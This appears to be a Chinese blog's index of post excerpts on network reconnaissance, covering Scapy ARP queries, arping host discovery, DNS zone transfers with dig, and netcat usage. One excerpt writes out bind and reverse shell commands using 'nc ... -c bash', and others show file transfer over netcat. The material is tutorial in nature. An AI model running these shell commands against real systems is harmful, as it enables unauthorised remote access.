beyond_unknown

摘要： Scapy scapy中函数ARP()即可实现arp查询 ARP函数里含有包头信息，但此时还没有目标IP地址 arp=ARP() arp.pdst="192.168.1.1" 可通过以上命令赋于IP地址 再通过sr1(arp)发送数据包 也可以直接用一行命令来执行： 阅读全文

摘要： 数据链路层（ARP）：扫描速度快，但是只能在同网段内进行扫描。 arping命令： -c only send count requests -d find duplicate replies 发现重复IP地址 主机发现： arping -c 1 192.168.1.1 #若该主机存活，将返回其MAC 阅读全文

摘要： DNA区域传输： 1. dig @ns1.example.com example.com axfr 如果成功，所有DNS变更将会同步传输，尝试连接使用TCP的53端口，DNS解析是用UDP的53端口 AXFR: transfer of an entire zone 2. host -T -l sin 阅读全文

摘要： 命令： 所有DNS信息：dig mail.163.com any 筛选部分信息：dig +noall +answer mail.163.com | awk '{print &5}' 直接输出结果 反向查询：dig -x 220.181.12.209 查询bind版本：dig +noall +answ 阅读全文

摘要： 正向： A: nc -lp 333 -c bash B: nc -nv ip 333 即B服务器可远程登录到A服务器的shell 反向： A: nc -lp 333 B: nc -nv ip 333 -c bash A服务器监听B的shell Windows下将bash换成cmd nc的弱点：是明文 阅读全文

摘要： 恢复内容开始 传输文件 A: nc -lp 333 > 1.mp4 B: nc -nv ip 333 < 1.mp4 传输目录 A: tar -cvf -unknown | nc -l 333 B: nc -nv ip 333 | tar -xvf - 加密文件传输 nc -l 333 | mcry 阅读全文

摘要： nc -vn -v 显示连接详细的输出内容 -n不会进行DNS解析 Instances： nc -l -p xxx 监听xxx端口 阅读全文